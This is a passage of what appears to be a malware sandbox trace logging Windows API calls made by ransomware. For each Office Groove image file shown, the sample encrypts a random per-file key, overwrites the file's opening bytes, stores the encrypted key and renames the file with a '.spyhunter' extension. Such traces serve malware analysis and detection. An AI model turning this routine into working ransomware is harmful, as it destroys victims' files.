Flags=0x8, Size=0x70) returned 0x31f020 [0106.719] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f858*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f858*=0x30) returned 1 [0106.719] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WSSFilesToolIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\wssfilestooliconimages.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0106.719] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WSSFilesToolIconImages.jpg") returned 89 [0106.719] StrStrW (lpFirst="WSSFilesToolIconImages.jpg", lpSrch=".txt") returned 0x0 [0106.727] GetProcessHeap () returned 0x2c0000 [0106.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0106.727] ReadFile (in: hFile=0x154, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f81c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f81c*=0x2308, lpOverlapped=0x0) returned 1 [0106.739] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffdcf8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0106.739] WriteFile (in: hFile=0x154, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2308, lpNumberOfBytesWritten=0x270f81c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f81c*=0x2308, lpOverlapped=0x0) returned 1 [0106.740] GetProcessHeap () returned 0x2c0000 [0106.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0106.740] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.741] WriteFile (in: hFile=0x154, lpBuffer=0x270f85c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f81c, lpOverlapped=0x0 | out: lpBuffer=0x270f85c*, lpNumberOfBytesWritten=0x270f81c*=0x4, lpOverlapped=0x0) returned 1 [0106.741] WriteFile (in: hFile=0x154, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f81c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f81c*=0x30, lpOverlapped=0x0) returned 1 [0106.741] CloseHandle (hObject=0x154) returned 1 [0106.741] GetProcessHeap () returned 0x2c0000 [0106.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ce0318 [0106.741] wnsprintfW (in: pszDest=0x2ce0318, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WSSFilesToolIconImages.jpg.spyhunter") returned 99 [0106.741] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WSSFilesToolIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\wssfilestooliconimages.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WSSFilesToolIconImages.jpg.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\wssfilestooliconimages.jpg.spyhunter")) returned 1 [0106.742] GetProcessHeap () returned 0x2c0000 [0106.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce0318 | out: hHeap=0x2c0000) returned 1 [0106.742] GetProcessHeap () returned 0x2c0000 [0106.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0106.742] GetProcessHeap () returned 0x2c0000 [0106.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35c460 | out: hHeap=0x2c0000) returned 1 [0106.745] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f858 | out: pbBuffer=0x270f858) returned 1 [0106.745] GetProcessHeap () returned 0x2c0000 [0106.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0106.745] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f850*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f850*=0x30) returned 1 [0106.745] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\GlobeButtonImageMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\calendar\\globebuttonimagemask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0106.747] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\GlobeButtonImageMask.bmp") returned 107 [0106.747] StrStrW (lpFirst="GlobeButtonImageMask.bmp", lpSrch=".txt") returned 0x0 [0106.747] GetProcessHeap () returned 0x2c0000 [0106.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0106.747] ReadFile (in: hFile=0x154, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f814, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f814*=0x778, lpOverlapped=0x0) returned 1 [0106.787] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffff888, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0106.787] WriteFile (in: hFile=0x154, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x778, lpNumberOfBytesWritten=0x270f814, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f814*=0x778, lpOverlapped=0x0) returned 1 [0106.787] GetProcessHeap () returned 0x2c0000 [0106.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0106.787] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.788] WriteFile (in: hFile=0x154, lpBuffer=0x270f854*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f814, lpOverlapped=0x0 | out: lpBuffer=0x270f854*, lpNumberOfBytesWritten=0x270f814*=0x4, lpOverlapped=0x0) returned 1 [0106.788] WriteFile (in: hFile=0x154, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f814, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f814*=0x30, lpOverlapped=0x0) returned 1 [0106.788] CloseHandle (hObject=0x154) returned 1 [0106.788] GetProcessHeap () returned 0x2c0000 [0106.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ce0318 [0106.788] wnsprintfW (in: pszDest=0x2ce0318, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\GlobeButtonImageMask.bmp.spyhunter") returned 117 [0106.788] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\GlobeButtonImageMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\calendar\\globebuttonimagemask.bmp"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\GlobeButtonImageMask.bmp.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\calendar\\globebuttonimagemask.bmp.spyhunter")) returned 1 [0106.788] GetProcessHeap () returned 0x2c0000 [0106.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce0318 | out: hHeap=0x2c0000) returned 1 [0106.789] GetProcessHeap () returned 0x2c0000 [0106.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0106.789] GetProcessHeap () returned 0x2c0000 [0106.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37bdc0 | out: hHeap=0x2c0000) returned 1 [0106.789] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f858 | out: pbBuffer=0x270f858) returned 1 [0106.789] GetProcessHeap () returned 0x2c0000 [0106.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0106.789] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f850*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f850*=0x30) returned 1 [0106.789] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\CalendarToolIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\calendar\\calendartooliconimagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0107.106] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\CalendarToolIconImagesMask.bmp") returned 113 [0107.106] StrStrW (lpFirst="CalendarToolIconImagesMask.bmp", lpSrch=".txt") returned 0x0 [0107.106] GetProcessHeap () returned 0x2c0000 [0107.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0107.106] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f814, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f814*=0xc38, lpOverlapped=0x0) returned 1 [0107.136] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffff3c8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.136] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xc38, lpNumberOfBytesWritten=0x270f814, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f814*=0xc38, lpOverlapped=0x0) returned 1 [0107.137] GetProcessHeap () returned 0x2c0000 [0107.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0107.137] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.137] WriteFile (in: hFile=0x16c, lpBuffer=0x270f854*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f814, lpOverlapped=0x0 | out: lpBuffer=0x270f854*, lpNumberOfBytesWritten=0x270f814*=0x4, lpOverlapped=0x0) returned 1 [0107.137] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f814, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f814*=0x30, lpOverlapped=0x0) returned 1 [0107.137] CloseHandle (hObject=0x16c) returned 1 [0107.137] GetProcessHeap () returned 0x2c0000 [0107.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ce0318 [0107.137] wnsprintfW (in: pszDest=0x2ce0318, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\CalendarToolIconImagesMask.bmp.spyhunter") returned 123 [0107.137] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\CalendarToolIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\calendar\\calendartooliconimagesmask.bmp"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\CalendarToolIconImagesMask.bmp.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\calendar\\calendartooliconimagesmask.bmp.spyhunter")) returned 1 [0107.138] GetProcessHeap () returned 0x2c0000 [0107.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce0318 | out: hHeap=0x2c0000) returned 1 [0107.138] GetProcessHeap () returned 0x2c0000 [0107.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0107.138] GetProcessHeap () returned 0x2c0000 [0107.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c18f40 | out: hHeap=0x2c0000) returned 1 [0107.139] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f850 | out: pbBuffer=0x270f850) returned 1 [0107.140] GetProcessHeap () returned 0x2c0000 [0107.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0107.140] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f848*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f848*=0x30) returned 1 [0107.140] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\DocumentShare\\WSSFilesToolHomePageBackground.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\documentshare\\wssfilestoolhomepagebackground.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0107.140] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\DocumentShare\\WSSFilesToolHomePageBackground.jpg") returned 122 [0107.140] StrStrW (lpFirst="WSSFilesToolHomePageBackground.jpg", lpSrch=".txt") returned 0x0 [0107.140] GetProcessHeap () returned 0x2c0000 [0107.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0107.141] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f80c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f80c*=0x2800, lpOverlapped=0x0) returned 1 [0107.142] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.142] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f80c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f80c*=0x2800, lpOverlapped=0x0) returned 1 [0107.142] GetProcessHeap () returned 0x2c0000 [0107.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0107.142] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.142] WriteFile (in: hFile=0x16c, lpBuffer=0x270f84c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f80c, lpOverlapped=0x0 | out: lpBuffer=0x270f84c*, lpNumberOfBytesWritten=0x270f80c*=0x4, lpOverlapped=0x0) returned 1 [0107.144] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f80c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f80c*=0x30, lpOverlapped=0x0) returned 1 [0107.144] CloseHandle (hObject=0x16c) returned 1 [0107.144] GetProcessHeap () returned 0x2c0000 [0107.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ce0318 [0107.144] wnsprintfW (in: pszDest=0x2ce0318, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\DocumentShare\\WSSFilesToolHomePageBackground.jpg.spyhunter") returned 132 [0107.144] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\DocumentShare\\WSSFilesToolHomePageBackground.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\documentshare\\wssfilestoolhomepagebackground.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\DocumentShare\\WSSFilesToolHomePageBackground.jpg.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\documentshare\\wssfilestoolhomepagebackground.jpg.spyhunter")) returned 1 [0107.145] GetProcessHeap () returned 0x2c0000 [0107.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce0318 | out: hHeap=0x2c0000) returned 1 [0107.145] GetProcessHeap () returned 0x2c0000 [0107.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0107.145] GetProcessHeap () returned 0x2c0000 [0107.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x38eb38 | out: hHeap=0x2c0000) returned 1 [0107.145] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f848 | out: pbBuffer=0x270f848) returned 1 [0107.145] GetProcessHeap () returned 0x2c0000 [0107.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0107.145] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f840*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f840*=0x30) returned 1 [0107.145] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Discussion\\DiscussionToolIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\discussion\\discussiontooliconimagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0107.174] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Discussion\\DiscussionToolIconImagesMask.bmp") returned 117 [0107.174] StrStrW (lpFirst="DiscussionToolIconImagesMask.bmp", lpSrch=".txt") returned 0x0 [0107.174] GetProcessHeap () returned 0x2c0000 [0107.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0107.175] ReadFile (in: hFile=0x154, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f804, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f804*=0x1738, lpOverlapped=0x0) returned 1 [0107.187] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffe8c8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.187] WriteFile (in: hFile=0x154, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1738, lpNumberOfBytesWritten=0x270f804, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f804*=0x1738, lpOverlapped=0x0) returned 1 [0107.187] GetProcessHeap () returned 0x2c0000 [0107.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0107.187] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.188] WriteFile (in: hFile=0x154, lpBuffer=0x270f844*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f804, lpOverlapped=0x0 | out: lpBuffer=0x270f844*, lpNumberOfBytesWritten=0x270f804*=0x4, lpOverlapped=0x0) returned 1 [0107.188] WriteFile (in: hFile=0x154, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f804, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f804*=0x30, lpOverlapped=0x0) returned 1 [0107.188] CloseHandle (hObject=0x154) returned 1 [0107.188] GetProcessHeap () returned 0x2c0000 [0107.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ce0318 [0107.188] wnsprintfW (in: pszDest=0x2ce0318, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Discussion\\DiscussionToolIconImagesMask.bmp.spyhunter") returned 127 [0107.188] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Discussion\\DiscussionToolIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\discussion\\discussiontooliconimagesmask.bmp"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Discussion\\DiscussionToolIconImagesMask.bmp.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\discussion\\discussiontooliconimagesmask.bmp.spyhunter")) returned 1 [0107.189] GetProcessHeap () returned 0x2c0000 [0107.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce0318 | out: hHeap=0x2c0000) returned 1 [0107.189] GetProcessHeap () returned 0x2c0000 [0107.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0107.189] GetProcessHeap () returned 0x2c0000 [0107.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x38ea00 | out: hHeap=0x2c0000) returned 1 [0107.192] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f840 | out: pbBuffer=0x270f840) returned 1 [0107.192] GetProcessHeap () returned 0x2c0000 [0107.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0107.192] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f838*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f838*=0x30) returned 1 [0107.192] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\MarkupIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\groovedocumentreview\\markupiconimagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0107.193] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\MarkupIconImagesMask.bmp") returned 119 [0107.193] StrStrW (lpFirst="MarkupIconImagesMask.bmp", lpSrch=".txt") returned 0x0 [0107.193] GetProcessHeap () returned 0x2c0000 [0107.193] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0107.193] ReadFile (in: hFile=0x154, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f7fc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f7fc*=0x74, lpOverlapped=0x0) returned 1 [0107.194] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffff8c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.194] WriteFile (in: hFile=0x154, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x74, lpNumberOfBytesWritten=0x270f7fc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f7fc*=0x74, lpOverlapped=0x0) returned 1 [0107.195] GetProcessHeap () returned 0x2c0000 [0107.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0107.195] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.195] WriteFile (in: hFile=0x154, lpBuffer=0x270f83c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f7fc, lpOverlapped=0x0 | out: lpBuffer=0x270f83c*, lpNumberOfBytesWritten=0x270f7fc*=0x4, lpOverlapped=0x0) returned 1 [0107.195] WriteFile (in: hFile=0x154, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f7fc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f7fc*=0x30, lpOverlapped=0x0) returned 1 [0107.195] CloseHandle (hObject=0x154) returned 1 [0107.195] GetProcessHeap () returned 0x2c0000 [0107.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ce0318 [0107.195] wnsprintfW (in: pszDest=0x2ce0318, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\MarkupIconImagesMask.bmp.spyhunter") returned 129 [0107.195] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\MarkupIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\groovedocumentreview\\markupiconimagesmask.bmp"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\MarkupIconImagesMask.bmp.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\groovedocumentreview\\markupiconimagesmask.bmp.spyhunter")) returned 1 [0107.196] GetProcessHeap () returned 0x2c0000 [0107.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce0318 | out: hHeap=0x2c0000) returned 1 [0107.196] GetProcessHeap () returned 0x2c0000 [0107.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0107.196] GetProcessHeap () returned 0x2c0000 [0107.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x38eda8 | out: hHeap=0x2c0000) returned 1 [0107.196] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f840 | out: pbBuffer=0x270f840) returned 1 [0107.196] GetProcessHeap () returned 0x2c0000 [0107.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0107.197] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f838*=0x20, dwBufLen=0x30 | out: 